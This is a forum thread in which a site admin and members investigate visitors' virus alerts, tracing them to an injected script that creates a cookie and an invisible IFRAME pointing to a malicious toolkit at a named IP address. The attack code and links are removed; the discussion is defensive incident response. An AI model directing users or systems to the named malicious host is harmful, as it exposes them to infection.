Need help: People getting Virus alert on site....
- Status
Just got me again ...just opened my browser , I was not logged on. looked at a thread and came back and it did it again . If the past is any indication it will not happen again this session
I have no clue how to find this source code thinger you need :embaresse
I really appreciate how hard you are working to try and fix this Jim :notworthy:
I have no clue how to find this source code thinger you need :embaresse
I really appreciate how hard you are working to try and fix this Jim :notworthy:
I'm trying really hard, so please bear with me.....
I've not been able to uncover anything on our server. But, there are a goodly number of reports of malicious ad's over the past few days. Some big players were hit. My guess is we are part of that situation.
I suspect that the reason we are getting these intermittent traps is the intermittent nature of the ad's.
I'll keep working on this, and keep reporting what you find.
The usual warnings apply. Never install anything that appears to have been prompted to from our site and keep those virus scanners running.
Thanks,
Jim
I've not been able to uncover anything on our server. But, there are a goodly number of reports of malicious ad's over the past few days. Some big players were hit. My guess is we are part of that situation.
I suspect that the reason we are getting these intermittent traps is the intermittent nature of the ad's.
I'll keep working on this, and keep reporting what you find.
The usual warnings apply. Never install anything that appears to have been prompted to from our site and keep those virus scanners running.
Thanks,
Jim
I've been given permission to turn off our Google Ad's for 24 hours.
Lets see if that helps.
Thanks to BasicDad for capturing some page source for me. It appears a cookie/script is being inserted before our website code. Not sure what to make of that.
For those interested, in Firefox you can right click your mouse and pick the option "View Source", then cut and paste it into an email to me.
Sorry, don't know how its done in IE.
Jim
Lets see if that helps.
Thanks to BasicDad for capturing some page source for me. It appears a cookie/script is being inserted before our website code. Not sure what to make of that.
For those interested, in Firefox you can right click your mouse and pick the option "View Source", then cut and paste it into an email to me.
Sorry, don't know how its done in IE.
Jim
WARNING: Some of the URLs that follow lead to a known malicious toolkit (a.k.a. virus). The only SAFE LINK to click on below is that referring you to www.symantec.com -- click wisely!
The actual code for the toolkit follows:
-- Froglips removed code, if you want to see a copy, just ask. --
[/INDENT]Which, as mentioned earlier, is getting prepended to the normal HTTP response. The source of the infection originates with -- Froglips removed link to bad guys -- at 85.114.143.47 and which forwards the browser to yet another URL: -- froglips removed link to bad guys -- (also at 85.114.143.47). This is a known malicious toolkit, for more information, please visit:
http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=50031
This is a frustratingly intermittent issue, In 8 hours time I only managed to encounter it once (at 3:35am Eastern) and (annoyingly due to a typo) only captured half the tcpdump for analysis, despite several thousand reloads of the NCWW homepage.
Because it is getting inserted at the beginning of a TCP session, this leads me to suggest that either the HTTP daemon has suffered a buffer overflow (and, as such, is in need of shutdown, patching, and finally restarted once patched) OR NCWW's web presence provider has a higher-level infected server (in the case of a shared virtual server) or router. Of these, an http daemon infected by means of a buffer overflow is the most likely explanation.
If these were servers in physical posession this would be far easier to confirm, as remotely managed servers things can get complicated by restrictions the provider may have in place, particularly on shared servers.
Best of luck!
EDIT: Admins, if you know how to get vbulletin to NOT hyperlink the harmful URLs I would appreciate the edit. I originally created the above with the URL hyperlinks REMOVED. Unfortunately, when submitted vBulletin overrode my directives and turned them back into hyperlinked URLs... READERS SHOULD EXERCISE EXTRA CAUTION AS A RESULT!!!
The actual code for the toolkit follows:
-- Froglips removed code, if you want to see a copy, just ask. --
[/INDENT]Which, as mentioned earlier, is getting prepended to the normal HTTP response. The source of the infection originates with -- Froglips removed link to bad guys -- at 85.114.143.47 and which forwards the browser to yet another URL: -- froglips removed link to bad guys -- (also at 85.114.143.47). This is a known malicious toolkit, for more information, please visit:
http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=50031
This is a frustratingly intermittent issue, In 8 hours time I only managed to encounter it once (at 3:35am Eastern) and (annoyingly due to a typo) only captured half the tcpdump for analysis, despite several thousand reloads of the NCWW homepage.
Because it is getting inserted at the beginning of a TCP session, this leads me to suggest that either the HTTP daemon has suffered a buffer overflow (and, as such, is in need of shutdown, patching, and finally restarted once patched) OR NCWW's web presence provider has a higher-level infected server (in the case of a shared virtual server) or router. Of these, an http daemon infected by means of a buffer overflow is the most likely explanation.
If these were servers in physical posession this would be far easier to confirm, as remotely managed servers things can get complicated by restrictions the provider may have in place, particularly on shared servers.
Best of luck!
EDIT: Admins, if you know how to get vbulletin to NOT hyperlink the harmful URLs I would appreciate the edit. I originally created the above with the URL hyperlinks REMOVED. Unfortunately, when submitted vBulletin overrode my directives and turned them back into hyperlinked URLs... READERS SHOULD EXERCISE EXTRA CAUTION AS A RESULT!!!
Last edited by a moderator:
To view source in Internet Explorer, one may right-click, then select 'View Source' from the popup menu. A dialog window will then open displaying the source code for the given page. From there you may select 'File/Save/HTML Source' to save the source code to a file.
Thanks! We are getting closer!
I now see this code when I am not logged into the site. As soon as I log in, the bad code "is gone".
So far, cannot find any evidence its coming from withing our code.
I'll take your suggestions and start looking up the ladder.
Jim
p.s. I edited Ethan's post to remove links and code to the evil doers. But, if you'd like to see it, drop me a PM and I'll share it. Probably being paranoid, but I tell you, they really are following me!!
I now see this code when I am not logged into the site. As soon as I log in, the bad code "is gone".
So far, cannot find any evidence its coming from withing our code.
I'll take your suggestions and start looking up the ladder.
Jim
p.s. I edited Ethan's post to remove links and code to the evil doers. But, if you'd like to see it, drop me a PM and I'll share it. Probably being paranoid, but I tell you, they really are following me!!
In term of shear probability, the code is almost certainly being inserted by a comprimised http daemon. Since the infection would exist only in memory (RAM) the file system will pass any antivirus scans with ease. Even a scan of system memory will likely pass since the inserted code is not a virust perse (It just creates a cookie and sets up an invisible IFRAME). It's the URL the IFRAME code points to that actually returns the malicious toolkit that is causing us all this trouble.
In the short term, stopping and restarting the http daemon will likely clear things up, but no telling how much time may pass before it becomes reinfected until the hole is patched.
Again, good luck and I hope some of this helps to get you pointed in the proper direction. The randomness of this infection makes it very frustrating to track down.
In the short term, stopping and restarting the http daemon will likely clear things up, but no telling how much time may pass before it becomes reinfected until the hole is patched.
Again, good luck and I hope some of this helps to get you pointed in the proper direction. The randomness of this infection makes it very frustrating to track down.
- Status
